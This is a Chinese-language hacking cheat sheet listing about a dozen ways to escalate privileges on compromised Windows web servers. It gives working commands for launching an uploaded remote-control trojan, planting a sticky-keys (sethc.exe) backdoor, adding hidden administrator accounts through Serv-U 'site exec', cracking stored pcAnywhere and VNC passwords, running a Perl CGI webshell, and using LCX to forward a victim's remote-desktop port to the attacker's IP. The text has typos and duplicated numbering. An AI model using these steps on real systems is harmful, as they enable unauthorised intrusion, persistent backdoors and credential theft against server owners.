几种可以提权的办法
可以执行CMD时候
1.A:将远控的后缀改为.tmp,然后上传上去~!
B:将该远控传上去。
C:用命令start e:/admin/admin.tmp,然后等着木马上线~!
2.替换服务 提权shift键
A:在CMD下执行一下命令: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
B:链接远程桌面,然后连续按5次shift键,就可以浏览C盘了~!然后C盘windows里面TSadmin.exe可 以查看用户的上线情况。
3.不能执行EXE那么你可以尝试传一个BAT文件或者VBS然后运行~!
4.Cmd命令下终结提权 恢复命令 值的收藏 2000 c:\WINNT\syetem32\inetsrv\httpext.dll c:\WINNT\syetem32\inetsrv\httpodbc.dll c:\WINNT\syetem32\inetsrv\ssinc.dll c:\WINNT\syetem32\inetsrv\msw3prt.dll c:\WINNT\syetem32\inetsrv\asp.dll 2003/xp c:\windows\syetem32\inetsrv\httpext.dll c:\windows\syetem32\inetsrv\httpodbc.dll c:\windows\syetem32\inetsrv\ssinc.dll c:\windows\syetem32\inetsrv\msw3prt.dll c:\windows\syetem32\inetsrv\asp.dll
5.当不能执行CMD时候.
A:我们可以上传ASPX马来执行,CMD命令~!
B:如果不能执行NET就可以执行NET1来创建用户。NET1不行就用巴西烤肉,2000系统不可以~! 只有2003的系统可以,我们可以先用NET START来看看系统~!
-----------------------------------不可以用CMD命令的时候---------------------------------
6.serv-U
A:可读可写 [USER=wind|1] Password=gn3436a2a7150feb9edf0151aec2bcbde2 ''密码:1234567'' HomeDir=c:\ TimeOut=600 Maintenance=System Access1=C:\|RWAMELCDP Access2=d:\|RWAMELCDP Access3=e:\|RWAMELCDP Access4=f:\|RWAMELCDP Access5=g:\|RWAMELCDP ftp 192.168.0.1
B:连接FTP,然后执行下面命令 Quote site exec net user xshuai$ xshuai /add quote site exec net localgroup administrators xshuai$ /add 如果提不上,大小写转换试试~! quote site exec net.exe user kuba8 Aa123456 /add quote site exec net.exe localgroup Administrators kuba8 /add
C:可读不可写 直接用蛋蛋创建用户。然后远程登陆~!
7.pcAnywhere
A:用pcAnywhere下载网站目录下的CIF文件然后打开~!
B:如果没有就去C:\Documents and Settings\All Users里面找找~!
C:有就去破解下,密码就出来了~!
D:然后用pcAnywhere连接~!
8.FTPXP 需要下载的文件: quick.dat sites.dat stats.dat 然后拿到本地替换。然后用FTP自动登陆
9.VNC A:利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解
B:注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
C:CMD先,然后输入VNC4X.exe -W。
D:输入那些数字,然后点回车,密码就出来了.最后用VNC登录。
10.如果装了MYSQL就去到C:\windows盘去找MY.INI文件,如果版本高的话就找PHP.INI。读取配置文件, 然后用牛族的去连接。。或者从网站里面找IPCONFIG.php或者CONN.PHP。。
11.方案一:如果program files目录可写的话可以用马来替换服务的启动项~! 方案二:写个VBS或者BAT放入启动项里面创建一个用户,就可以提权了~! 方案三:随便在A.B.C.D.E.F.G盘中的哪盘上传autorun.inf文件和VBS文件,然后等待重启就可以添加 用户。
12.利用perl提升权限(上传一个CGI脚本) c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell将CMD.PL放到PERL目录下的BIN目中。然后到网站上运行,然后在浏览器上输入 http://localhost/bin/CMD.PL?net user 就是查看用户(如果不能运行,可以试试改为cgi 扩展呢,把刚才的 pl文件改为 cgi文件) 然后建立一个用户就可以了~! 11.端口映射LCX A:在自己机子的cmd下运行 lcx.exe -listen 51 3389 (意思是监听51端口并转发到3389端口) B:在SHELL上执行CMD比如LCX在C盘那么 C:\lcx.exe -slave 你的IP 51 肉机IP 3389 (意思是 把肉机的3389端口 转发到 自己的IP 51端口上) C:用本机的IP 连接,就可以了~!